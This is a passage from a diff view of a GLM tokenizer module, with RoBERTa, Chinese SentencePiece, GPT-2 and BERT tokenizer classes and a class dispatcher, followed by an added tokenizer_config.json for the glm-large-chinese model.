+ attention_mask = torch.cat((attention_mask, generation_attention_mask), dim=2)
197
+ attention_mask = attention_mask.unsqueeze(1)
198
+ if targets is None:
199
+ input_ids = torch.cat((input_ids, input_ids.new_full((batch_size, 1), self.sop_token_id)), dim=-1)
200
+ else:
201
+ input_ids = torch.cat((input_ids, targets[:, :-1]), dim=1)
202
+ batch = {"input_ids": input_ids, "position_ids": position_ids}
203
+ if labels is None:
204
+ batch["generation_attention_mask"] = attention_mask
205
+ else:
206
+ batch["attention_mask"] = attention_mask
207
+ batch["labels"] = labels
208
+ return BatchEncoding(batch)
209
+
210
+
211
+ class GLMRobertaTokenizer(RobertaTokenizer, GLMTokenizerMixin):
212
+ model_input_names = ["input_ids", "position_ids", "attention_mask"]
213
+ truncation_side: str = "left"
214
+
215
+ @property
216
+ def gmask_token_id(self) -> int:
217
+ raise NotImplementedError("The model doesn't support gMASK")
218
+
219
+ @property
220
+ def smask_token_id(self) -> int:
221
+ raise NotImplementedError("The model doesn't support sMASK")
222
+
223
+ @property
224
+ def mask_token_ids(self):
225
+ return [self.mask_token_id]
226
+
227
+
228
+ class GLMChineseTokenizer(PreTrainedTokenizer, GLMTokenizerMixin):
229
+ vocab_files_names = {"vocab_file": "cog-pretrain.model"}
230
+ truncation_side: str = "left"
231
+
232
+ def __init__(self, vocab_file, **kwargs):
233
+ super().__init__(**kwargs)
234
+ self.vocab_file = vocab_file
235
+ self.sp_model = spm.SentencePieceProcessor()
236
+ self.sp_model.Load(vocab_file)
237
+
238
+ @property
239
+ def vocab_size(self):
240
+ return len(self.sp_model)
241
+
242
+ def get_vocab(self):
243
+ vocab = {self.convert_ids_to_tokens(i): i for i in range(self.vocab_size)}
244
+ vocab.update(self.added_tokens_encoder)
245
+ return vocab
246
+
247
+ def _tokenize(self, text, **kwargs):
248
+ return self.sp_model.encode(text, out_type=str)
249
+
250
+ def _convert_token_to_id(self, token):
251
+ """Converts a token (str) in an id using the vocab."""
252
+ return self.sp_model.PieceToId(token)
253
+
254
+ def _convert_id_to_token(self, index):
255
+ """Converts an index (integer) in a token (str) using the vocab."""
256
+ return self.sp_model.IdToPiece(index)
257
+
258
+ def convert_tokens_to_string(self, tokens):
259
+ return self.sp_model.decode(tokens)
260
+
261
+ def save_vocabulary(self, save_directory: str, filename_prefix: Optional[str] = None) -> Tuple[str]:
262
+ if not os.path.isdir(save_directory):
263
+ logger.error(f"Vocabulary path ({save_directory}) should be a directory")
264
+ return
265
+ out_vocab_file = os.path.join(
266
+ save_directory, (filename_prefix + "-" if filename_prefix else "") + self.vocab_files_names["vocab_file"]
267
+ )
268
+
269
+ if os.path.abspath(self.vocab_file) != os.path.abspath(out_vocab_file) and os.path.isfile(self.vocab_file):
270
+ copyfile(self.vocab_file, out_vocab_file)
271
+ elif not os.path.isfile(self.vocab_file):
272
+ with open(out_vocab_file, "wb") as fi:
273
+ content_spiece_model = self.sp_model.serialized_model_proto()
274
+ fi.write(content_spiece_model)
275
+
276
+ return (out_vocab_file,)
277
+
278
+ def build_inputs_with_special_tokens(
279
+ self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None
280
+ ) -> List[int]:
281
+ """
282
+ Build model inputs from a sequence or a pair of sequence for sequence classification tasks by concatenating and
283
+ adding special tokens. A BERT sequence has the following format:
284
+
285
+ - single sequence: ``[CLS] X [SEP]``
286
+ - pair of sequences: ``[CLS] A [SEP] B [SEP]``
287
+
288
+ Args:
289
+ token_ids_0 (:obj:`List[int]`):
290
+ List of IDs to which the special tokens will be added.
291
+ token_ids_1 (:obj:`List[int]`, `optional`):
292
+ Optional second list of IDs for sequence pairs.
293
+
294
+ Returns:
295
+ :obj:`List[int]`: List of `input IDs <../glossary.html#input-ids>`__ with the appropriate special tokens.
296
+ """
297
+ assert token_ids_1 is None
298
+ cls = [self.cls_token_id]
299
+ eos = [self.eos_token_id]
300
+ return cls + token_ids_0 + eos
301
+
302
+
303
+ class GLMGPT2Tokenizer(GPT2Tokenizer, GLMTokenizerMixin):
304
+ model_input_names = ["input_ids", "position_ids", "attention_mask"]
305
+ truncation_side: str = "left"
306
+
307
+ def build_inputs_with_special_tokens(
308
+ self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None
309
+ ) -> List[int]:
310
+ """
311
+ Build model inputs from a sequence or a pair of sequence for sequence classification tasks by concatenating and
312
+ adding special tokens. A BERT sequence has the following format:
313
+
314
+ - single sequence: ``[CLS] X [SEP]``
315
+ - pair of sequences: ``[CLS] A [SEP] B [SEP]``
316
+
317
+ Args:
318
+ token_ids_0 (:obj:`List[int]`):
319
+ List of IDs to which the special tokens will be added.
320
+ token_ids_1 (:obj:`List[int]`, `optional`):
321
+ Optional second list of IDs for sequence pairs.
322
+
323
+ Returns:
324
+ :obj:`List[int]`: List of `input IDs <../glossary.html#input-ids>`__ with the appropriate special tokens.
325
+ """
326
+ assert token_ids_1 is None
327
+ cls = [self.cls_token_id]
328
+ eos = [self.eos_token_id]
329
+ return cls + token_ids_0 + eos
330
+
331
+
332
+ class GLMBertTokenizer(BertTokenizer, GLMTokenizerMixin):
333
+ model_input_names = ["input_ids", "position_ids", "attention_mask"]
334
+ truncation_side: str = "left"
335
+
336
+ @property
337
+ def gmask_token_id(self) -> int:
338
+ raise NotImplementedError("The model doesn't support gMASK")
339
+
340
+ @property
341
+ def smask_token_id(self) -> int:
342
+ raise NotImplementedError("The model doesn't support sMASK")
343
+
344
+ @property
345
+ def mask_token_ids(self):
346
+ return [self.mask_token_id]
347
+
348
+
349
+ class GLMTokenizer:
350
+ @classmethod
351
+ def from_pretrained(cls, pretrained_model_name_or_path, *inputs, **kwargs):
352
+ tokenizer_config = get_tokenizer_config(pretrained_model_name_or_path, **kwargs)
353
+ config_tokenizer_class = tokenizer_config.get("tokenizer_class")
354
+ if config_tokenizer_class == "GLMRobertaTokenizer":
355
+ tokenizer_class = GLMRobertaTokenizer
356
+ elif config_tokenizer_class == "GLMChineseTokenizer":
357
+ tokenizer_class = GLMChineseTokenizer
358
+ elif config_tokenizer_class == "GLMGPT2Tokenizer":
359
+ tokenizer_class = GLMGPT2Tokenizer
360
+ elif config_tokenizer_class == "GLMBertTokenizer":
361
+ tokenizer_class = GLMBertTokenizer
362
+ else:
363
+ raise NotImplementedError("Not implemented tokenizer type:", config_tokenizer_class)
364
+ return tokenizer_class.from_pretrained(pretrained_model_name_or_path, *inputs, **kwargs)
tokenizer_config.json ADDED
@@ -0,0 +1,18 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "name_or_path": "THUDM/glm-large-chinese",
3
+ "eos_token": "<|endoftext|>",
4
+ "pad_token": "<|endoftext|>",
5
+ "cls_token": "[CLS]",
6
+ "mask_token": "[MASK]",
7
+ "unk_token": "[UNK]",
8
+ "additional_special_tokens": ["<|startofpiece|>", "<|endofpiece|>", "[gMASK]", "[sMASK]"],
9
+ "add_prefix_space": false,
10
+ "tokenizer_class": "GLMChineseTokenizer",
11
+ "use_fast": false,
12
+ "auto_map": {
13
+ "AutoTokenizer": [
14
+ "tokenization_glm.GLMChineseTokenizer",
15
+ null
16
+ ]
17
+ }
18
+ }